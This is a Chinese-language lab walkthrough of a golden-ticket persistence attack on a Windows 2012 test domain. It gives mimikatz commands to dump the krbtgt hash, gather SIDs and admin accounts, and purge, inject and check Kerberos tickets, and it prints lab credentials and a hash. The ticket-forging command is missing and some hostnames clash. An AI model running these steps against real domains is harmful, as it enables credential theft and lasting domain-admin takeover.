黄金票据维持域控权限

实验环境：windows2012域控、windows2012域内主机

实验要求：利用黄金票据维持域控权限

实验内容

实验环境：
域控制器
Ip地址：192.168.33.139
域名：son.yang.com
用户名：administrator
密码：111.aaa
域成员服务器
IP地址：192.168.33.140
域名：son.yang.com
用户名：2012-3
密码：333.aaa

导出krbtgt的NTLM Hash

在与控制器中打开命令行环境，运行mimikatz，输入如下命令
privilege::debug
Lsadump::lsa /patch /name:krbtgt

导出krbtgt的NTLM Hash

获取基本信息

在域成员服务器中获取基本信息

获取域SID

在命令行环境中输入如下命令，查询SID
wmic useraccount get name,sid

采用这种方法，可以以普通域用户权限获取域内所有用户的SID。可以看到son.yang.com的域SID号。

获取当前用户的SID

输入如下命令，获取当前用户的SID
Whoami /user

查询域管理员账号

输入如下命令，查询域管理员账号
net group “domain admins” /domain

查询域名

在命令行环境中输入如下命令，查询域名
ipconfig /all

实验操作

在获取目标主机的权限后，查看当前用户及其所属的组

输入命令“dir //2012-12/c$”,在注入票据前将返回提示信息“拒绝访问”

清空票据

在mimikatz中输入如下命令，将票据清空
Kerberos::purge

Sid:S-1-5-21-3907342585-4074712004-4245116346
b7c2c6b78141e1204a4c61137c4ff9e7

利用获取的信息，生成票据

输入命令，使mimikatz生成包含krbtgt身份的票据

命令执行后会提示保存成功，会在本地目录下生成一个名为“Administrator.kiribi”的文件

传递票据并注入内存

输入命令，将Administrator.kiribi票据注入内存
Kerberos::ptt Administrator.kiribi

检索当前会话中的票据

在mimikatz中输入如下命令，刚刚注入的票据就会出现在当前的会话中
Kerberos::tgt

验证权限

退出mimikatz，验证实验中伪造的身份是否已经得到了域控制器的权限
在mimikatz中，输入“exit”命令退出，在当前命令行窗口中输入命令“dir //2012-2/c$”
2012-2为域控制器

可以看到，在将票据注入内存之前，系统提示权限不足；再将票据注入内存之后，列出了域控制器C盘的目录，表示身份伪造成功。